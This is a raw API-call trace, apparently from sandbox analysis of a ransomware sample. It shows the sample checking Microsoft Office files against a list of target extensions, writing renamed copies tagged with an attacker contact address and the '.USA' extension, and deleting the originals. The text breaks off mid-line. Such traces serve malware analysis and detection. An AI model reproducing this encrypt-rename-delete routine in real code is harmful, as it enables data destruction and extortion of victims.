[0271.956] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString=".rar") returned 4 [0271.956] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString=".bz2") returned 4 [0271.956] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0271.956] lstrlenW (lpString=".7z") returned 3 [0271.956] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0271.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.956] lstrlenW (lpString=".dbf") returned 4 [0271.956] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0271.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.956] lstrlenW (lpString=".1cd") returned 4 [0271.956] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0271.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.957] lstrlenW (lpString=".jpg") returned 4 [0271.957] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0271.957] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0271.957] lstrlenW (lpString="BULLETS.DLL") returned 11 [0271.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.997] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=15264) returned 1 [0271.997] CloseHandle (hObject=0x394) returned 1 [0271.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll")) returned 0x20 [0271.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.005] lstrlenW (lpString=".doc") returned 4 [0272.005] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.005] lstrlenW (lpString=".docx") returned 5 [0272.005] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.005] lstrlenW (lpString=".pdf") returned 4 [0272.005] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString=".xls") returned 4 [0272.006] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString=".xlsx") returned 5 [0272.006] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.006] lstrlenW (lpString=".ppt") returned 4 [0272.006] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.006] lstrlenW (lpString=".zip") returned 4 [0272.006] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString=".rar") returned 4 [0272.006] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString=".bz2") returned 4 [0272.006] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.006] lstrlenW (lpString=".7z") returned 3 [0272.006] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.006] lstrlenW (lpString=".dbf") returned 4 [0272.006] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.006] lstrlenW (lpString=".1cd") returned 4 [0272.006] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.006] lstrlenW (lpString=".jpg") returned 4 [0272.006] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.006] lstrlenW (lpString=".doc") returned 4 [0272.006] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.006] lstrlenW (lpString=".docx") returned 5 [0272.006] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.007] lstrlenW (lpString=".pdf") returned 4 [0272.007] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.007] lstrlenW (lpString=".xls") returned 4 [0272.007] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.007] lstrlenW (lpString=".xlsx") returned 5 [0272.007] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.007] lstrlenW (lpString=".ppt") returned 4 [0272.007] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.007] lstrlenW (lpString=".zip") returned 4 [0272.007] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.007] lstrlenW (lpString=".rar") returned 4 [0272.007] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.007] lstrlenW (lpString=".bz2") returned 4 [0272.007] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.007] lstrlenW (lpString=".7z") returned 3 [0272.007] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.007] lstrlenW (lpString=".dbf") returned 4 [0272.007] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.007] lstrlenW (lpString=".1cd") returned 4 [0272.007] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0272.007] lstrlenW (lpString=".jpg") returned 4 [0272.007] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.007] lstrcmpiW (lpString1=".ACC", lpString2=".USA") returned -1 [0272.007] lstrlenW (lpString="ACCESS12.ACC") returned 12 [0272.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.008] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=495616) returned 1 [0272.008] CloseHandle (hObject=0x388) returned 1 [0272.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 0x20 [0272.009] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.009] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.009] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.049] GetLastError () returned 0x0 [0272.049] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x79000, lpOverlapped=0x0) returned 1 [0272.059] WriteFile (in: hFile=0x2bc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x79010, lpOverlapped=0x0) returned 1 [0272.068] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.068] WriteFile (in: hFile=0x2bc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.068] SetEndOfFile (hFile=0x2bc) returned 1 [0272.068] CloseHandle (hObject=0x2bc) returned 1 [0272.068] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.068] SetEndOfFile (hFile=0x388) returned 1 [0272.141] CloseHandle (hObject=0x388) returned 1 [0272.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 1 [0272.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.148] lstrlenW (lpString=".doc") returned 4 [0272.148] lstrcmpiW (lpString1=".doc", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString=".docx") returned 5 [0272.148] lstrcmpiW (lpString1=".docx", lpString2="2.ACC") returned -1 [0272.148] lstrlenW (lpString=".pdf") returned 4 [0272.148] lstrcmpiW (lpString1=".pdf", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString=".xls") returned 4 [0272.148] lstrcmpiW (lpString1=".xls", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString=".xlsx") returned 5 [0272.148] lstrcmpiW (lpString1=".xlsx", lpString2="2.ACC") returned -1 [0272.148] lstrlenW (lpString=".ppt") returned 4 [0272.148] lstrcmpiW (lpString1=".ppt", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.148] lstrlenW (lpString=".zip") returned 4 [0272.148] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString=".rar") returned 4 [0272.148] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString=".bz2") returned 4 [0272.148] lstrcmpiW (lpString1=".bz2", lpString2=".ACC") returned 1 [0272.148] lstrlenW (lpString=".7z") returned 3 [0272.148] lstrcmpiW (lpString1=".7z", lpString2="ACC") returned -1 [0272.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.148] lstrlenW (lpString=".dbf") returned 4 [0272.149] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.149] lstrlenW (lpString=".1cd") returned 4 [0272.149] lstrcmpiW (lpString1=".1cd", lpString2=".ACC") returned -1 [0272.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.149] lstrlenW (lpString=".jpg") returned 4 [0272.149] lstrcmpiW (lpString1=".jpg", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.149] lstrlenW (lpString=".doc") returned 4 [0272.149] lstrcmpiW (lpString1=".doc", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString=".docx") returned 5 [0272.149] lstrcmpiW (lpString1=".docx", lpString2="2.ACC") returned -1 [0272.149] lstrlenW (lpString=".pdf") returned 4 [0272.149] lstrcmpiW (lpString1=".pdf", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString=".xls") returned 4 [0272.149] lstrcmpiW (lpString1=".xls", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString=".xlsx") returned 5 [0272.149] lstrcmpiW (lpString1=".xlsx", lpString2="2.ACC") returned -1 [0272.149] lstrlenW (lpString=".ppt") returned 4 [0272.149] lstrcmpiW (lpString1=".ppt", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.149] lstrlenW (lpString=".zip") returned 4 [0272.149] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString=".rar") returned 4 [0272.149] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString=".bz2") returned 4 [0272.149] lstrcmpiW (lpString1=".bz2", lpString2=".ACC") returned 1 [0272.149] lstrlenW (lpString=".7z") returned 3 [0272.149] lstrcmpiW (lpString1=".7z", lpString2="ACC") returned -1 [0272.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.149] lstrlenW (lpString=".dbf") returned 4 [0272.150] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1 [0272.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.150] lstrlenW (lpString=".1cd") returned 4 [0272.150] lstrcmpiW (lpString1=".1cd", lpString2=".ACC") returned -1 [0272.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60 [0272.150] lstrlenW (lpString=".jpg") returned 4 [0272.150] lstrcmpiW (lpString1=".jpg", lpString2=".ACC") returned 1 [0272.150] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.150] lstrlenW (lpString="ACWIZRC.DLL") returned 11 [0272.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.150] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=275856) returned 1 [0272.150] CloseHandle (hObject=0x384) returned 1 [0272.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll")) returned 0x20 [0272.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.151] lstrlenW (lpString=".doc") returned 4 [0272.151] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.151] lstrlenW (lpString=".docx") returned 5 [0272.151] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0272.151] lstrlenW (lpString=".pdf") returned 4 [0272.151] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.151] lstrlenW (lpString=".xls") returned 4 [0272.151] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.151] lstrlenW (lpString=".xlsx") returned 5 [0272.151] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0272.151] lstrlenW (lpString=".ppt") returned 4 [0272.151] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.151] lstrlenW (lpString=".zip") returned 4 [0272.151] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.151] lstrlenW (lpString=".rar") returned 4 [0272.151] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.151] lstrlenW (lpString=".bz2") returned 4 [0272.151] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.151] lstrlenW (lpString=".7z") returned 3 [0272.151] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.151] lstrlenW (lpString=".dbf") returned 4 [0272.151] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.151] lstrlenW (lpString=".1cd") returned 4 [0272.151] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.152] lstrlenW (lpString=".jpg") returned 4 [0272.152] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.152] lstrlenW (lpString=".doc") returned 4 [0272.152] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString=".docx") returned 5 [0272.152] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0272.152] lstrlenW (lpString=".pdf") returned 4 [0272.152] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString=".xls") returned 4 [0272.152] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString=".xlsx") returned 5 [0272.152] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0272.152] lstrlenW (lpString=".ppt") returned 4 [0272.152] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.152] lstrlenW (lpString=".zip") returned 4 [0272.152] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString=".rar") returned 4 [0272.152] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.152] lstrlenW (lpString=".bz2") returned 4 [0272.152] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.152] lstrlenW (lpString=".7z") returned 3 [0272.152] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.153] lstrlenW (lpString=".dbf") returned 4 [0272.153] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.153] lstrlenW (lpString=".1cd") returned 4 [0272.153] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0272.153] lstrlenW (lpString=".jpg") returned 4 [0272.153] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.153] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.153] lstrlenW (lpString="AEC.VSL") returned 7 [0272.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.163] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=69496) returned 1 [0272.163] CloseHandle (hObject=0x3ac) returned 1 [0272.163] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl")) returned 0x20 [0272.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.270] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.270] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.271] GetLastError () returned 0x0 [0272.271] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x10f78, lpOverlapped=0x0) returned 1 [0272.280] WriteFile (in: hFile=0x2bc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x10f80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x10f80, lpOverlapped=0x0) returned 1 [0272.281] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.281] WriteFile (in: hFile=0x2bc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0272.281] SetEndOfFile (hFile=0x2bc) returned 1 [0272.282] CloseHandle (hObject=0x2bc) returned 1 [0272.282] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.282] SetEndOfFile (hFile=0x3b4) returned 1 [0272.284] CloseHandle (hObject=0x3b4) returned 1 [0272.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.288] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl")) returned 1 [0272.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.299] lstrlenW (lpString=".doc") returned 4 [0272.299] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.299] lstrlenW (lpString=".docx") returned 5 [0272.299] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1 [0272.299] lstrlenW (lpString=".pdf") returned 4 [0272.299] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.299] lstrlenW (lpString=".xls") returned 4 [0272.299] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.299] lstrlenW (lpString=".xlsx") returned 5 [0272.299] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1 [0272.300] lstrlenW (lpString=".ppt") returned 4 [0272.300] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.312] lstrlenW (lpString="C:\\Program Files\\Microsoft 